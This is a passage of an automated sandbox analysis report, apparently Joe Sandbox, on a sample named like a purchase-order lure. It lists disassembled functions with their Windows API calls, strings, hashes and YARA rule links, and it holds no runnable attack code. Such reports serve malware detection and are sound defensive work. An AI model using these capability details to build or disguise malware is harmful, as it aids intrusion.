Opcode Fuzzy Hash: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction Fuzzy Hash: 3B51E070A02259EBEF20CF64D888BAEBBF4EF84318F18411EE4159B291D778D940CB19

Function 00458DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0049DC00), ref: 00458E7C
WSAGetLastError.WSOCK32(00000000), ref: 00458E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00458EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00458EC5
_strlen.LIBCMT ref: 00458EF7
WSAGetLastError.WSOCK32(00000000), ref: 00458F6A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction ID: 492fe9b31153af44185be34426d0c69a1573ed1426ef4a2bf17fc750f9245427
Opcode Fuzzy Hash: 418caecbc6e56f38cfa77f444c88e018a1f28b76f6477bf0aaadda032fcb286f
Instruction Fuzzy Hash: 0941E971900104AFC704EB65CD86EAEB7B9AF48315F10466EF916A72D2DF38AE04CB58

Function 0041ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

BeginPaint.USER32(?,?,?), ref: 0041AC2A
GetWindowRect.USER32(?,?), ref: 0041AC8E
ScreenToClient.USER32(?,?), ref: 0041ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0041ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0041AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0047E673

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction ID: bc17de8597850ac8ecd1a7f4a605dc630b75c4cd4743ccb3255f9716c6cbda2d
Opcode Fuzzy Hash: c2a53bc7bb2e18bad1d35f1806f8f6d7846a0f0a60bb0c4cf28cf667100e6d41
Instruction Fuzzy Hash: A541C4706052009FC710DF25DC84FBB7BA8EF5A324F04066EF994872A2D3349895DBAA

Function 0046E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C1628,00000000,004C1628,00000000,00000000,004C1628,?,0047DC5D,00000000,?,00000000,00000000,00000000,?,0047DAD1,00000004), ref: 0046E40B
EnableWindow.USER32(00000000,00000000), ref: 0046E42F
ShowWindow.USER32(004C1628,00000000), ref: 0046E48F
ShowWindow.USER32(00000000,00000004), ref: 0046E4A1
EnableWindow.USER32(00000000,00000001), ref: 0046E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0046E4E8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction ID: e38680d0e56c83b23c7f5844027bfffcbb6f046283c39d97626a6b1eca441d47
Opcode Fuzzy Hash: 7e3eddb813cb98a9bf876ffff83290b2429d92cbf2861423786788bc6264c64e
Instruction Fuzzy Hash: 9A418378601140EFDB25CF36C499B957BE1FF05704F1841BAEA588F2A2DB35E841CB56

Function 004498BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004498D1

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00449908
EnterCriticalSection.KERNEL32(?), ref: 00449924
LeaveCriticalSection.KERNEL32(?), ref: 0044999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004499B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 004499D2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: a1eb9348b47650628fea22efe17ecd4995d0f7adb2bb3af9f1f5bd13ea6e4b0f
Instruction ID: 6d9c1d8ffcb9c1f7d0860105f5f55980207e4b5724d6ad1e77c4c748931ed47b
Opcode Fuzzy Hash: a1eb9348b47650628fea22efe17ecd4995d0f7adb2bb3af9f1f5bd13ea6e4b0f
Instruction Fuzzy Hash: 13319271A00105ABDB00AF95DD85DAF7778FF44310B1480BAE904AB286D738DE15DB68

Function 0043AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0043AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0043AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0043AFC4
CloseHandle.KERNEL32(00000004), ref: 0043AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0043B012

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction ID: b7a48fbf2d84a4435ac36968e78f9f79161879e2cb968d09ab52d1702d349b35
Opcode Fuzzy Hash: df057fa67cb3837beb8e6d891de21c122c86fc64cd341552d7f9278925da4716
Instruction Fuzzy Hash: 4F215072541209AFDF019F94DD09FAE7BA9EF48308F14502AFE41A21A1C37A9D21DB65

Function 00AF185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AEFDB7), ref: 00AF185F
_free.LIBCMT ref: 00AF1892
_free.LIBCMT ref: 00AF18BA
SetLastError.KERNEL32(00000000), ref: 00AF18C7
SetLastError.KERNEL32(00000000), ref: 00AF18D3
_abort.LIBCMT ref: 00AF18D9

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 56a6cf9403d0a82d611835950dac0b5f8bc3363858d437d148074d05b6c94223
Instruction ID: 70ee8bfabb17bf57980d376d6d9f6ebdd0bcf142b656488bac7f1404c947aace
Opcode Fuzzy Hash: 56a6cf9403d0a82d611835950dac0b5f8bc3363858d437d148074d05b6c94223
Instruction Fuzzy Hash: 34F0F933140609AAC22173F4AE06FBA22969BD17A1F640134F71992291FF618C428291

Function 0046EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0046EC20
LineTo.GDI32(00000000,00000003,?), ref: 0046EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EC42
LineTo.GDI32(00000000,00000000,?), ref: 0046EC52
EndPath.GDI32(00000000), ref: 0046EC62
StrokePath.GDI32(00000000), ref: 0046EC72

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction ID: a9fbaf3aecc94b696b7302446875f4ff34609ecfac3ca3e8697b261464c7832e
Opcode Fuzzy Hash: ab6dafa2a8e780bd9416af2acd0d5a58d07b6b6bfcf1382a6565474913d09774
Instruction Fuzzy Hash: 2B113572401148BFEF029F90DC88EEA7FADEF09364F048526BE089A1B0D7719D55DBA4

Function 0043E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0043E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0043E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0043E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0043E209

Part of subcall function 00439AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00439A05,00000000,00000000,?,00439DDB), ref: 0043A53A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction ID: c7a5ca771fd91314f3d855d0b2c07d8d13f392a1f48880b11d21432277bd3176
Opcode Fuzzy Hash: 100bf36fc0cc57922195767d8ac8667467d734e44cc3b284f00f91914693cef0
Instruction Fuzzy Hash: D50184B5E01219BFEF10ABA68C45F5EBFB8EB48351F00446AEE04A73D0D6709C00CB64

Function 004027EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0040281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00402825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00402830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0040283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00402843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0040284B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction ID: 6e9604c49f6eb5af476f9dbc967e5a635b3d3e71b3018c9c8894ab6170c87e60
Opcode Fuzzy Hash: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction Fuzzy Hash: 0E016CB0902B5D7DE3008F6A8C85B56FFA8FF15354F00411B915C47941C7F5A864CBE5

Function 0045AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B006
CharUpperBuffW.USER32(?,?), ref: 0045B115
VariantClear.OLEAUT32(?), ref: 0045B298

Part of subcall function 00449DC5: VariantInit.OLEAUT32(00000000), ref: 00449E05
Part of subcall function 00449DC5: VariantCopy.OLEAUT32(?,?), ref: 00449E0E
Part of subcall function 00449DC5: VariantClear.OLEAUT32(?), ref: 00449E1A

Strings

Incorrect Parameter format, xrefs: 0045B03E, 0045B20B
AUTOIT.ERROR, xrefs: 0045B11B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
Instruction ID: 52e6914b55ff8660d76304c2970caaf1dc2d4c1ce0d6a1091d09d6c503672bea
Opcode Fuzzy Hash: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
Instruction Fuzzy Hash: 7C917B706083019FCB10DF25C48595BB7E4EF88705F04486EF89A9B3A2DB39E949CB96

Function 00445347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_memset.LIBCMT ref: 00445438
GetMenuItemInfoW.USER32(?), ref: 00445467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00445513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0044553D

Strings

0, xrefs: 00445430

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction ID: 229c3148a9e1a9bfe78ef1b1e5e27531e8706f457ea565323bfac3cc7c02ae31
Opcode Fuzzy Hash: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction Fuzzy Hash: 3B51E071604701ABEB159F28C841B7BB7E8AB86354F04062FF895D72D3DB78CD448B5A

Function 00440213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004402B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004402C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00440344

Strings

DllGetClassObject, xrefs: 004402B7

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction ID: c3b2b385fa8966dad99c77db0206707ef9e6cc297604f621ef3166624dd72a76
Opcode Fuzzy Hash: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction Fuzzy Hash: 3B418F71600204EFEB05DF54C885B9E7BB9EF44314B1480AEEE099F246D7B8DD50CBA4

Function 00445007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445075
GetMenuItemInfoW.USER32 ref: 00445091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 004450D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C1708,00000000), ref: 00445120

Strings

0, xrefs: 0044506D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction ID: db465f5d1fa94ec0c75b63f3553bf801786c42f1ac7b6e4bf5c0d2fbc051ce62
Opcode Fuzzy Hash: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction Fuzzy Hash: 4441B1306057419FEB10DF25D885B2BB7E4AF89728F044A2FF85597392D734E800CB6A

Function 00460567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00460587

Strings

cdecl, xrefs: 004605DE
winapi, xrefs: 004605F8
stdcall, xrefs: 00460609
none, xrefs: 00460662

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction ID: 5a99cc48baeaf98d2ac020c3fe827800d2685473d087967778722ea71df5eec6
Opcode Fuzzy Hash: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction Fuzzy Hash: 7B31A370500116ABCF00EF55CD419EFB3B4FF54318B10862FE826A76D2EB79A956CB98

Function 0043B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0043B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0043B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0043B8D1

Strings

ComboBox, xrefs: 0043B815
ListBox, xrefs: 0043B84D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 412483d3d58d27abbe8d0b37aa77e3ba7b73ad12b5cbd7d043ce77851ab0f321
